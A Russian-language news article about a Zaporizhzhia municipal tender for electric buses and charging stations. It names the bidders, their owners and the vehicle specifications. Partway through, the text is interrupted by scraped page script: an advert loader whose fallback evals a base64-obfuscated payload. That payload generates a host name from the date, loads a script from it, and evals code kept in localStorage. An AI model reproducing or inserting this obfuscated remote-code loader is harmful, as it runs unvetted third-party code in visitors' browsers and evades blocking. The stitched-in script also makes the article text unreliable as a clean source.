КП «Запорожэлектротранс» городского совета объявило тендер на закупку электробусов с электрическими двигателями и сопутствующей инфраструктурой на 123 миллиона гривен.
Источник финансирования – государственный бюджет Украины.Об этом сообщается в системе публичных закупок «Prozorro», передает 061.
Всего собираются купить 5 электрических двигателей, два устройства медленной зарядки, большегрузные мототранспортные средства, пантографные зарядные станции, а также услуги надзора при монтаже (пробный пуск, проверка электрических параметров) с технической и гарантийной поддержкой.
В настоящее время в системе зарегистрировались три участника – киевская фирма «БИО». Она принадлежит сыну крымского политика и предпринимателю Александру Абдураимову и Игорю Середе. Также участником является фирма БКМ-Украина, где в основателях фирма «РИСТ-Н» из Луцка и белорусский производитель «Управляющая компания холдинга «Белкоммунмаш». Третий участник — ООО «Современные грузовики», основанное в Киеве в 2008 году, принадлежат через ООО «Риалто» и ПАО «Закрытый недиверсифицированный венчурный корпоративный инвестиционный фонд «Коннект» брату и сестре Евгению и Ольге Мещаниным. В этом году фирма получила тендеры на более, чем 50 миллионов гривен.
Требования к электробусу — большой емкости с низким уровнем пола, приспособленный к пассажирам с ограниченными возможностями (оборудованный откидным трапом). При этом в КП потребовали, чтобы транспорт был не ранее 2022 года выпуска. Исполнитель обязан предоставить полную документацию, связанную с графическим представлением салона электробуса вместе с внешними и внутренними размерами. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Максимальная скорость – не менее 70 км/час. Сам кузов должен быть выполнен из стали с повышенной коррозионной устойчивостью. Наружное покрытие боковых стенок должно быть выполнено из алюминия и/или стали, устойчивой к воздействию коррозии, пластических масс или композитных материалов, аккумуляторная батарея снабжена защелкой и блокировкой движения транспортного средства с открытой крышкой. Лобовое стекло должно быть выполнено из многослойного, безопасного стекла. Боковое стекло и заднее стекло при наличии из закаленного, безопасного стекла, вклеенное в кузов. Лобовое стекло передней панели управления обогревается и/или обдувается приточной вентиляцией, а также через систему кондиционирования воздуха электробуса. Фары должны быть с лампами, выполненными по технологии LED, с функцией дополнительного освещения поворотов.
Внутренняя обшивка: ламинированная звукопоглощающая плита, межоконные стойки и подоконные планки из пластмассы и/или алюминия. Отделка полосы над окнами: покрытие из пластических масс, усиленных стекловолокном или из алюминиевых панелей и ламината. Потолок: плиты из пластмассы и/или перфорированной плиты светлого цвета, вся поверхность крыши изолирована.
Что же касается потребления электрической энергии, то подрядчик обязан указать потребление электрической энергии согласно тесту SORT 2. Испытание должно быть выполнено предприятием изготовителем и подтверждено протоколами экзаменов или сертифицировано учреждением, зарегистрированным на территории Европейского союза или в Украине.
Сам аукцион запланирован на 10 января 2022 года. Ключевым условием будет большая энергоемкость аккумулятора, способная продержаться до 300 километров хода от зарядки до зарядки. Также электробусы должны быть оснащены системой кондиционирования салона, зарядными подстанциями, пневмоподвеской и иметь установленный дизайн. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-zaporozhe-zakupyat-elektrobusov-i-detalej-k-nim-na-123-milliona-vse-podrobnosti/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook